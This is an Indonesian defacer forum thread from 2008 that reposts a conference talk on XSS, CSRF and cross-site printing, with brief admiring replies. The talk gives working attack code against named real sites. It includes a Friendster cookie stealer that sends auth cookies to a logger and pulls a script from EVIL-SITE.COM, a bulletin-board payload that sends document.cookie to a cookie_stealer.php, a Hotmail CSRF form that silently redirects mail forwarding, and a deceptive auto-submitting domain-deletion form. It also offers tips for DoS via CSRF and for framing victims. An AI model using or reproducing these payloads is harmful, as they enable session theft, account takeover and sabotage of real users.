Komunitas Defacer Indonesia


 

IndeksPortalFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 The X (Presentasi Hacker's Night Day)

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Cruz3N
Newbie
Newbie


Jumlah posting : 23
Join date : 03.06.08

PostSubyek: The X (Presentasi Hacker's Night Day)   Thu Jul 03, 2008 4:53 am

Sumber : Presentasi Hacker's Night Day by Anselmus Ricky (Th0R)
Judul : The X



~ Cross Site Scripting (XSS)‏
~ Cross Site Request Forgery (CSRF)‏
~ Cross Site Printing (XSP)
~ Malicious JavaScript

Payload of an XSS, CSRF and/or XSP attacks. Typically written in JavaScript, and executed in a browser.

Cross Site Scripting (XSS)‏
Forcing malicious content to be served by a trusted website to an unsuspecting user.

Being hacked with an Cross Site Scripting (XSS) Attacks!
~ Website owner embedded his own website with a malicious javascript.
~ Website defaced with embedded javascript malware.
~ Javascript malware injected into a public area of a website (Persistent XSS).
~ Click on a specially-crafted link causing the website to echo javascript malware (Non-Persistent XSS).

Type of XSS

~ Persistent XSS
The persistent or Type 2 XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities

~ Non-persistent XSS
The non-persistent or Type 1 cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user

Non-persistent XSS
Example:

http://protocollo.gov.it/01RiepIni.asp?NI="><script>alert(“Th0R%20was%20Here!")</script>

http://www.friendster.com/gallery.php?_ ... own&kword=[PUT XSS CODE HERE]

http://www.friendster.com/gallery.php?_ ... Fscript%3E

http://www.friendster.com/gallery.php?_ ... /script%3E

File.js

var pUrl=window.location.href.search(/profiles\./),pV=pageViewerID,pO=pageOwnerID,pN=pageViewerFName;
var cLoger=”YOUR_LOGER_FILE.PHP”,ck=fgetCookie(”friendster_auth”);
fr=document.createElement(’iframe’);
fr.height=’0′;fr.width=’0′;fr.frameBorder=’0′;
fr.src=cLoger+’?c=’+escape(ck)+’&s=’+escape(pN)+’~'+pV+’~@’+pO;navigation.appendChild(fr);

Filejs2.txt
fr=document.createElement(’iframe’);fr.height=’0′;fr.width=’0′;fr.frameBorder=’0′;fr.src=’http://www.friendster.com/gallery.php?_submitted=1&ktype=hometown&kword=%3C/script%3E%3Cscript%20src%3D%22http%3A//EVIL-SITE.COM/filejs.js%22%3E%3C/script%3E’;flo1t.appendChild(fr);

Injected Code
<img xmlns:dict=”dict” alt=”star” src=”http://images.friendster.com/images/rating_star.gif” onLoaD =”a=document.createElement(’script’);a.src=’http://EVIL-SITE.COM/filejs2.txt’;flo1t.appendChild(a)” style=height:0;width:0>

Example:
~ Bulletin Board Attack (Where HTML posting are allowed).
~ <pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document·cookie' b='<pre' >
~ Email Hacking (Tested on Yahoo and Gmail quite long time ago).
~ etc

Cross Site Request Forgery (CSRF)‏
Also known as XSRF or 1-click attack or sidejacking, forcing an unsuspecting user’s browser to send request they didn’t intend.

The use of Cross Site Request Forgery (CSRF) to hack!
~ Can be used in order to hack/break into several free mail providers in this world, such as http://www.hotmail.com
~ If you want to send someone to Jail just because they clicked on your built-up links, then you can do It with CSRF! I myself name it 1-Click to Jail!
~ CSRF attacks are also usable for boosting up more powers on several other kind of attacks such as Denial of Service (DoS) and/or Distributed Denial of Service (DDoS).

CSRF on Hotmail Video
Can be downloaded here:
http://www.th0r.info/products/clip0001.rar

CSRF on Hotmail Hacking

~ *.html files attached within emails:

<html>
<body>
<bOdy onload=”document.CSRF.submit()”>
<form name=”CSRF” method=”POST” action=”http://by138w.bay138.mail.live.com/mail/options.aspx?subsect
ion=32&n=487173350&resend=0″ style=”display:none”>
</body>
</html>

~ Actual link:
http://by111w.bay111.mail.live.com/mail ... ection=32&
amp;n=487173350&resend=0&gs=true&ctl02%24SaveBu
tton=true%ctl02%24ForwardingToggle=2&ctl02%24AddressTextB
ox=binus_2_0_0_4@hotmail.com

Better Clue: “You need an iFrame”

Doing DoS by using CSRF
All equipments you need:

~ Browser (Can be IE/FireFox/Safari/etc).
~ A website that can help you on doing Sitemap Generator.
~ A little program to do the looping.
~ Your hands and eyes to watch over the victim’s website.

Annoying CSRF
Look at this:

<form name=”f” action=”http://www.uni.cc/site/dcp_ddelete1.php” method=”POST”>
<input type=”hidden” name=”DN” value=”testdoank.uni.cc“>
<input type=”submit” name=”s” class=”btn” value=”Click here to see my HOT Pics”>
</form>
<script language=”javascript”>
document.forms[0].submit()
</script>

Cross Site Printing (XSP)‏
Forcing malicious content to be served by a trusted website to several specific Intranet Network and an unsuspecting printers.

What you can do with Cross Site Printing?!

<FORM Action='http://YOURPRINTER:9100' ID='MsgForm' ENCTYPE='Multipart/Form-data' Method='POST'> <TEXTAREA NAME='MSG' ID='MSG' WRAP='NONE' ROWS='50' COLS='100'> Testing this printer out. </TEXTAREA><INPUT TYPE=SUBMIT Value=SUBMIT></FORM>

Most of today’s Cross Site scripting attacks are using this kind of trick:

http://bbs.cn.yahoo.com/searchApplyBoar ... 0Pg==.html

Translated into human tounge as - <script>alert("XSS-bypass-No-Script")</script>

Sory neh kalo ane gak bisa translate, lagian pasti dikit2 ngerti dong...
Dan sory banget kalo lancang langsung buat post... bounce bounce bounce
Kembali Ke Atas Go down
Lihat profil user
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: The X (Presentasi Hacker's Night Day)   Thu Jul 03, 2008 4:59 am

wew kelen

seep coba translate pake kalkulator Razz

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: The X (Presentasi Hacker's Night Day)   Thu Jul 03, 2008 9:12 am

wedew ....

keren banget omz ...
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
ascii
Admin
Admin


Jumlah posting : 379
Join date : 18.04.08

PostSubyek: Re: The X (Presentasi Hacker's Night Day)   Sun Jul 06, 2008 12:33 pm

kupas tuntas... Wink
Kembali Ke Atas Go down
Lihat profil user
cr4wl3r
I'am Not Hacker
I'am Not Hacker


Jumlah posting : 373
Join date : 18.04.08
Age : 30
Lokasi : In Your Mind

PostSubyek: Re: The X (Presentasi Hacker's Night Day)   Mon Jul 07, 2008 8:29 am

thanks for share bro
Kembali Ke Atas Go down
Lihat profil user http://gorontalodefacer.forumandco.com
eMoLution
Lamer
Lamer


Jumlah posting : 89
Join date : 02.08.08
Age : 25
Lokasi : --------

PostSubyek: Re: The X (Presentasi Hacker's Night Day)   Thu Aug 21, 2008 7:19 am

niCe Share.,.,,.,.,


i'm loVin it.,..,., drunken drunken drunken
Kembali Ke Atas Go down
Lihat profil user http://www.friendster.com/emolutionjelek
Sponsored content




PostSubyek: Re: The X (Presentasi Hacker's Night Day)   Today at 10:49 pm

Kembali Ke Atas Go down
 
The X (Presentasi Hacker's Night Day)
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» biodata night baron
» Help Yang tau gear buat Saber di Fate stay night
» White Night Fantasy....My Nightwish [UPDATED] CYCLONE 1
» DUNLOP,PIRELLI,MICHELIN,BATLAX..mana n tipe ap paling ok?
» Saran Modif penting harian. Ninja Commuter.

Permissions in this forum:Anda tidak dapat menjawab topik
::Gorontalo Defacer Community:: :: General Topic :: Tips and Trik-
Navigasi: